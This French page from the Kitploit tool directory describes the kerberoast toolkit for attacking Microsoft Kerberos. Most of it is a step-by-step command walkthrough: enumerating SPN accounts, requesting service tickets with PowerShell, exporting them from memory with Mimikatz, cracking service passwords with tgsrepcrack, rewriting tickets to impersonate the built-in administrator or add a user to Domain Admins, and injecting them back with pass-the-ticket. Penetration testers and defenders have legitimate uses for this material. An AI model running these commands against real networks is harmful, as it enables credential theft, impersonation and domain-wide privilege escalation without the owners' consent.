Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
kerberoast — Boîte à outils pour attaquer les implémentations MS Kerberos: extraire les comptes SPN, demander et exporter des tickets, cracker les mots de passe de service, réécrire les tickets pour l'usurpation d'identité et l'élévation de privilèges. | Kitploit
Outils/GitHubGitHub/nidem/kerberoast
Attaques de Mots de PasseExploitationTests d'IntrusionAuthentification
GitHubnidem/kerberoast

kerberoast

Boîte à outils pour attaquer les implémentations MS Kerberos: extraire les comptes SPN, demander et exporter des tickets, cracker les mots de passe de service, réécrire les tickets pour l'usurpation d'identité et l'élévation de privilèges.

Voir le dépôt
1.5k3127il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

kerberoast

Kerberoast est une série d'outils pour attaquer les implémentations Kerberos de Microsoft. Vous trouverez ci-dessous un bref aperçu de ce que chaque outil fait.

Extraire tous les comptes utilisés comme SPN à l'aide des outils MS intégrés

root@kitploit:~
PS C:\> setspn -T medin -Q */*

Demander un ou plusieurs tickets

Un ticket :

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

Tous les tickets

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Extraire les tickets acquis de la RAM avec Mimikatz

root@kitploit:~
mimikatz # kerberos::list /export

Cracker avec tgsrepcrack

root@kitploit:~
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Réécrire

Faire apparaître l'utilisateur comme un utilisateur différent

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

Ajouter un utilisateur à un autre groupe (ici, Administrateur du domaine)

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Injecter de nouveau dans la RAM avec Mimikatz

root@kitploit:~
kerberos::ptt sql.kirbi
Télécharger l’outil